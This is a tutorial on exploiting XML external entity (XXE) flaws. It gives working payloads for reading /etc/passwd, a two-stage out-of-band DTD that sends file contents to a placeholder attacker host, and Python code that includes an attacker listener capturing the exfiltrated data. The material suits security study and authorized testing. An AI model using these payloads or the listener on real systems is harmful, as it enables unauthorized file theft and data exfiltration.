This section covers pwning XML parsers with XML external entity (XXE) injection attacks. Depending on the parser and how it is configured, XXE injection can lead to information disclosure, server-side request forgery (SSRF), and in some cases remote command injection or remote code execution in web applications.

Testing for XXE

Here’s an example of testing for XXE in a web application’s XML parser. Suppose we submit the following input, which declares an internal entity named lastname. If the application renders Hacker as the last name of the User in its output, the parser is expanding the entities we define, so we know we can inject XML entities for the application to process:

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Hacker">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>
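
To reproduce this check locally, the sketch below parses the same document with Python’s standard-library xml.etree.ElementTree, which expands internal entities declared in the DOCTYPE. It only stands in for the web application’s parser, which is an assumption; the names PROBE and expanded_last_name are illustrative.

```python
import xml.etree.ElementTree as ET

# Same probe as above: an internal entity declared in the DOCTYPE.
PROBE = """<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Hacker">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>"""


def expanded_last_name(document: str) -> str:
    """Parse the document and return the text of the lastName element."""
    root = ET.fromstring(document)
    return root.findtext("lastName")


if __name__ == "__main__":
    # If this prints the entity's value rather than a literal "&lastname;",
    # the parser is expanding entities that we control.
    print(expanded_last_name(PROBE))
```

Against a real target, the equivalent signal is the entity’s value showing up wherever the application renders the last name.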

Retrieving files

After verifying the vulnerability, we can use it for information disclosure by pointing an external entity at a file on the host’s file system:

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>

Once we determine where the application renders the lastName value, we can read the contents of the file from the web application’s response.
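
The file-retrieval behavior can be reproduced locally. This is a minimal sketch, assuming a parser that has external general entities switched on; here that is Python’s xml.sax with feature_external_ges enabled, standing in for a vulnerable application. The helpers build_file_payload and parse_like_vulnerable_app and the class TextCollector are hypothetical names, and the target is a temporary file rather than /etc/passwd.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data found inside <lastName>."""

    def __init__(self):
        super().__init__()
        self.in_last_name = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "lastName":
            self.in_last_name = True

    def endElement(self, name):
        if name == "lastName":
            self.in_last_name = False

    def characters(self, content):
        if self.in_last_name:
            self.chunks.append(content)


def build_file_payload(file_uri: str) -> str:
    """Return the file-retrieval document with the entity pointed at file_uri."""
    return f"""<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "{file_uri}">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>"""


def parse_like_vulnerable_app(document: str) -> str:
    """Parse with external general entities enabled (the insecure setting)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # off by default in modern Python
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document.encode("utf-8")))
    return "".join(collector.chunks)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "secret.txt"  # stand-in for the targeted file
        target.write_text("root:x:0:0:root:/root:/bin/bash\n")
        print(parse_like_vulnerable_app(build_file_payload(target.as_uri())))
```

The parser substitutes the file’s contents for &lastname;, so whatever the application later does with the lastName value now carries the file.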

Error-based exploitation

If the information we’re targeting isn’t rendered by the web application in a way we can access after exploitation, we may still be able to disclose it through error-based exploitation. For example, the web application’s database might enforce a maximum character length on the lastname value it stores for each User. If we request a file on the host system whose size exceeds this limit, the web application may respond with an error that includes the rejected value, leaking the contents of the file we’re targeting.
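
The reasoning can be illustrated with a small simulation. Everything here is hypothetical: MAX_LAST_NAME, store_last_name, and handle_request model an application that rejects an over-long value and echoes it in the error it returns, which is the behavior error-based exploitation depends on. Real applications differ in what their errors reveal.

```python
MAX_LAST_NAME = 32  # hypothetical length limit on the stored last name


class FieldTooLong(ValueError):
    """Raised when a value does not fit in its column."""


def store_last_name(value: str, limit: int = MAX_LAST_NAME) -> str:
    """Hypothetical persistence step that echoes the rejected value."""
    if len(value) > limit:
        raise FieldTooLong(f"lastName exceeds {limit} characters: {value!r}")
    return value


def handle_request(expanded_last_name: str) -> str:
    """Return what the client would see for a given expanded entity value."""
    try:
        store_last_name(expanded_last_name)
    except FieldTooLong as exc:
        # A verbose error page leaks the value the parser expanded.
        return f"500 Internal Server Error: {exc}"
    return "200 OK"


if __name__ == "__main__":
    file_contents = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    print(handle_request("Hacker"))       # short value, nothing leaked
    print(handle_request(file_contents))  # long value, echoed in the error
```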

Out-of-band exploitation

We can also use SSRF to exfiltrate data out of band: we coerce the victim machine into loading external resources from a server we control, and the information is disclosed in the GET request the victim sends. Here’s an example of a payload that causes the victim to request an external DTD from our server and parse it, which in turn causes the victim to send a GET request containing the information we’re targeting.

First stage payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://IP_ADDRESS/second-stage-payload.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>

Second stage payload:

<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://IP_ADDRESS/out?%content;'>" >

The first stage payload causes the victim’s parser to request the second stage payload from our server. The second stage payload reads the contents of /etc/passwd into the content parameter entity, then defines the exfil entity, whose URL points at our web server and embeds those contents in the query string. When the parser resolves exfil, the victim sends a GET request to our server, and the contents of the file arrive in the requested URL.
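
The attacker side of this exchange needs a web server that serves the second stage payload and records whatever arrives on /out. The following is a minimal sketch using only Python’s standard library; build_second_stage, ExfilHandler, and start_listener are illustrative names, and deriving the callback address from the Host header is an assumption made for convenience.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import unquote, urlsplit


def build_second_stage(callback_base: str, target: str = "file:///etc/passwd") -> str:
    """Return the second stage DTD with the exfil entity aimed at callback_base."""
    return (
        f'<!ENTITY % content SYSTEM "{target}">\n'
        '<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM '
        f"'{callback_base}/out?%content;'>\" >\n"
    )


class ExfilHandler(BaseHTTPRequestHandler):
    captured = []  # decoded query strings received on /out

    def do_GET(self):
        parts = urlsplit(self.path)
        body = b""
        if parts.path == "/second-stage-payload.dtd":
            # Assumption: the victim can reach us at the host it just used.
            host = self.headers.get("Host", "IP_ADDRESS")
            body = build_second_stage(f"http://{host}").encode("utf-8")
        elif parts.path == "/out":
            # The leaked data is whatever follows the "?" in the request.
            self.captured.append(unquote(parts.query))
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the console quiet; captured holds what we care about


def start_listener(host: str = "127.0.0.1", port: int = 0) -> ThreadingHTTPServer:
    """Start the listener in a background thread and return the server."""
    server = ThreadingHTTPServer((host, port), ExfilHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling start_listener("0.0.0.0", 80) would expose it on all interfaces during an authorized test; the default binds to loopback on a free port, which is enough to confirm the flow before pointing the first stage payload at it.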

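Because the file contents are embedded in a URL, characters such as newlines can produce an invalid URL, so it’s likely that at least a portion of this request will fail, particularly for multi-line files. As a result, out-of-band exploitation of XXE vulnerabilities is a last resort, and not always the most effective approach.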